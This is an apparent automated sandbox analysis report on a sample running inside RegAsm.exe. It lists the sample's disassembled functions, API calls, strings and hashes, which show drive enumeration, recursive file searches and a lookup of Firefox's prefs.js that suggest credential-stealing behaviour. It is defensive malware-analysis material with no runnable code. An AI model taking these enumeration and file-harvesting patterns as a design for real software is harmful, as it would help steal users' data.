APIs

_EH_prolog.MSVCRT ref: 00416C76
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416CD8
memset.MSVCRT ref: 00416CF7
GetDriveTypeA.KERNEL32(?), ref: 00416D00
lstrcpy.KERNEL32(?,00000000), ref: 00416D20
lstrcpy.KERNEL32(?,00000000), ref: 00416D3E

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00416824: _EH_prolog.MSVCRT ref: 00416829
Part of subcall function 00416824: wsprintfA.USER32 ref: 0041684F
Part of subcall function 00416824: FindFirstFileA.KERNEL32(?,?), ref: 00416866
Part of subcall function 00416824: memset.MSVCRT ref: 0041687D
Part of subcall function 00416824: memset.MSVCRT ref: 0041688B
Part of subcall function 00416824: StrCmpCA.SHLWAPI(?,0042790C), ref: 004168A9
Part of subcall function 00416824: StrCmpCA.SHLWAPI(?,00427910), ref: 004168C3
Part of subcall function 00416824: wsprintfA.USER32 ref: 004168E7
Part of subcall function 00416824: StrCmpCA.SHLWAPI(?,004276C3), ref: 004168F8
Part of subcall function 00416824: wsprintfA.USER32 ref: 0041691E
Part of subcall function 00416824: memset.MSVCRT ref: 00416944
Part of subcall function 00416824: lstrcat.KERNEL32(?,?), ref: 00416956
Part of subcall function 00416824: strtok_s.MSVCRT ref: 0041698F
Part of subcall function 00416824: memset.MSVCRT ref: 004169A4
Part of subcall function 00416824: lstrcat.KERNEL32(?,?), ref: 004169B9

lstrcpy.KERNEL32(?,00000000), ref: 00416D61
lstrlenA.KERNEL32(?), ref: 00416DC6

Strings

%DRIVE_FIXED%, xrefs: 00416D45
*%DRIVE_REMOVABLE%*, xrefs: 00416CAD
*%DRIVE_FIXED%*, xrefs: 00416C8A
%DRIVE_REMOVABLE%, xrefs: 00416D27

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 2879972474-147700698
Opcode ID: cacc298ac799cf547cdf163b0edb4fb4cbd924548412a2733e71bb8354a340d2
Instruction ID: 1703d6cef1096230a7f12549c25830628f45b4ceb85490b3d7b0eeb715a60d6d
Opcode Fuzzy Hash: cacc298ac799cf547cdf163b0edb4fb4cbd924548412a2733e71bb8354a340d2
Instruction Fuzzy Hash: 515193B1900259ABDF20EF71DC59EEF7B6DEF16308F10401BB91596162EB388AC4CB95

Function 1B6FDB10 Relevance: 18.3, APIs: 12, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90784594a6216ef764bc45524d11553ac5da7a0da7f2ec3aa7e3c5fbe1f65f23
Instruction ID: 10c1fcd69aea28deec9bf34bf8083e36c4867748db4cf0ab71bc54ebe988efa3
Opcode Fuzzy Hash: 90784594a6216ef764bc45524d11553ac5da7a0da7f2ec3aa7e3c5fbe1f65f23
Instruction Fuzzy Hash: 5781E0F5A05301ABDB109F68CC91BABB3E9EFA4704F04082DF995D7250E7B5F9018B96

Function 0040B616 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 431filestringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040B61B
wsprintfA.USER32 ref: 0040B644
FindFirstFileA.KERNEL32(?,?), ref: 0040B65B
StrCmpCA.SHLWAPI(?,00426F3C), ref: 0040B678
StrCmpCA.SHLWAPI(?,00426F40), ref: 0040B692

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

lstrlenA.KERNEL32(00000000,00426C7F,00000000,?,?,?,00426F44,?,?,00426C7E), ref: 0040B742

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

FindNextFileA.KERNEL32(00000000,?), ref: 0040BBD9
FindClose.KERNEL32(00000000), ref: 0040BBE8

Strings

#, xrefs: 0040BB92
%s\*.*, xrefs: 0040B63E

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitwsprintf
String ID: #$%s\*.*
API String ID: 1095930517-2760317471
Opcode ID: e1c24d378bfdfba602383ca6e6df7d14b989e90407ca2097342b50269265c786
Instruction ID: 75b36c60b1e4bded4045529a093aff9f75072314e802afefe63593af8148a202
Opcode Fuzzy Hash: e1c24d378bfdfba602383ca6e6df7d14b989e90407ca2097342b50269265c786
Instruction Fuzzy Hash: AD02627180524DEADF05EBA5C956BDEBB789F15308F00419EE505A31C2DBB827C8CFA6

Function 1B6FDFC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

%lld %lld, xrefs: 1B6FE055

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %lld %lld
API String ID: 0-3794783949
Opcode ID: 295d8efefa4e825475288fcf08037ecc1e24e549f67fd33340e7ef97765b83cd
Instruction ID: 3923a8658243159791b876d0c63865ef56527a401e897e51db7640b2daa2f0c3
Opcode Fuzzy Hash: 295d8efefa4e825475288fcf08037ecc1e24e549f67fd33340e7ef97765b83cd
Instruction Fuzzy Hash: EB3106F5601300BBEA115B698C06FEBBAB9DFA5B10F00481CF68592291E776D91187A6

Function 1B7A14D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 360COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7A15A2
API called with NULL prepared statement, xrefs: 1B7A1571
%s at line %d of [%.10s], xrefs: 1B7A15B1
misuse, xrefs: 1B7A15AC
API called with finalized prepared statement, xrefs: 1B7A1586

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 0863eb37e32d960d98cc54f4e05da6e72205ed1e0948b8493a8ff5de5b6543da
Instruction ID: 502e673fdd7d41f13301e198089004c44ab55e3b5d545a59da7cf5593470c705
Opcode Fuzzy Hash: 0863eb37e32d960d98cc54f4e05da6e72205ed1e0948b8493a8ff5de5b6543da
Instruction Fuzzy Hash: E7C105B4D007419BFB608F36E8457DB77E5AF42794F08062CF88A97A41E775E448C7A2

Function 1B7AD4F0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 310COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7AD5DD
API called with NULL prepared statement, xrefs: 1B7AD5AC
%s at line %d of [%.10s], xrefs: 1B7AD5EC
misuse, xrefs: 1B7AD5E7
API called with finalized prepared statement, xrefs: 1B7AD5C1

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: af0f2a8edbc44545fe269033fd7d03e1ae75879a0882e5ece156804252fdd6cb
Instruction ID: 9cb6c699576d136ffa98c3ee663901df29eb110c1a066952a0e8a5aac3c1bdea
Opcode Fuzzy Hash: af0f2a8edbc44545fe269033fd7d03e1ae75879a0882e5ece156804252fdd6cb
Instruction Fuzzy Hash: 0DB1AFB49047019FE7518F34D889BDBB7E4BF45708F08462CF8AA9B241E775E449CBA2

Function 0040A17A Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A17F

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

FindFirstFileA.KERNEL32(00000000,?,00000000,?,00426E74,?,?,00426C4F,?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?,00426E78), ref: 0040A219
StrCmpCA.SHLWAPI(?,00426E7C), ref: 0040A233
StrCmpCA.SHLWAPI(?,00000000,?,?,?,00426E80,?,?,00426C52), ref: 0040A2CA
StrCmpCA.SHLWAPI(?), ref: 0040A34B

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00409391: _EH_prolog.MSVCRT ref: 00409396

FindNextFileA.KERNEL32(00000000,?), ref: 0040A534
FindClose.KERNEL32(00000000), ref: 0040A543

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 2015904956-0
Opcode ID: 92626a6cdc1c63cf4d2f8abad645325172b0a80dbff1d5aa29874edd3c670153
Instruction ID: 71f4a5b9c756dccbf14c8d77c32d1222cb4a70222b28986d9125b98b8d0954f8
Opcode Fuzzy Hash: 92626a6cdc1c63cf4d2f8abad645325172b0a80dbff1d5aa29874edd3c670153
Instruction Fuzzy Hash: 3AC18574900249EACF10EBB5C9467DD7FB8AF19304F50415EE855A32C2DBB85B88CBA7

Function 0040A595 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 441fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A59A

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00426C53,00000000,74E1AC90), ref: 0040A5F9
StrCmpCA.SHLWAPI(?,00426E8C), ref: 0040A616
StrCmpCA.SHLWAPI(?,00426E90), ref: 0040A630

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

FindNextFileA.KERNEL32(00000000,?), ref: 0040AB9C
FindClose.KERNEL32(00000000), ref: 0040ABAB

Strings

\*.*, xrefs: 0040A5BB
", xrefs: 0040AB1F

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: "$\*.*
API String ID: 1275501236-2874818444
Opcode ID: fee58b1a2a8577c94b7521fe7edc383d53312c93be2b8cb8f45bfe2ce1725cf9
Instruction ID: e46e9c3d9c55cb5b869c549ec544e4eef9c490dfa8f6b3faf50b226075c023b1
Opcode Fuzzy Hash: fee58b1a2a8577c94b7521fe7edc383d53312c93be2b8cb8f45bfe2ce1725cf9
Instruction Fuzzy Hash: C912707180114DEADB15EBA5C955BEEBBB8AF15308F10419EE105631C2DFB82BC8CFA5

Function 0040C0F8 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 311fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040C0FD

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

FindFirstFileA.KERNEL32(00000000,?,00000000,?,00426FC0,?,?,00426C9E,?,00000000,?), ref: 0040C17C
StrCmpCA.SHLWAPI(?,00426FC4,?,00000000,?), ref: 0040C1A0
StrCmpCA.SHLWAPI(?,00426FC8,?,00000000,?), ref: 0040C1BA
StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00426FCC,?,?,00426C9F,?,00000000,?), ref: 0040C256

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

FindNextFileA.KERNEL32(?,?,?,00000000,?), ref: 0040C4DF
FindClose.KERNEL32(?,?,00000000,?), ref: 0040C4F0

Strings

prefs.js, xrefs: 0040C24A

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 3307916976-3783873740
Opcode ID: cb1b43d1a985153124c9ca7fc9298b7660e5f5c10cb5b73b0d654c52ca1285ac
Instruction ID: b7d268ecd0f73e6739084cc28569164c6df36d410f19590cf288e92f0d628979
Opcode Fuzzy Hash: cb1b43d1a985153124c9ca7fc9298b7660e5f5c10cb5b73b0d654c52ca1285ac
Instruction Fuzzy Hash: 94D1B971900248EEDF14EBF5D956BDD7BB4AF19304F10419EE415A31C2DBB82B88CBA6

Function 1B735940 Relevance: 12.4, APIs: 8, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e3198e6f7e4fed7d99e4de022067f2d20b89a3626f5b9df4e586ea4224d035
Instruction ID: a16078fa2c334eb452f9fba0da9aaa9e37731df3d04cfe27af0ab2f04947810e
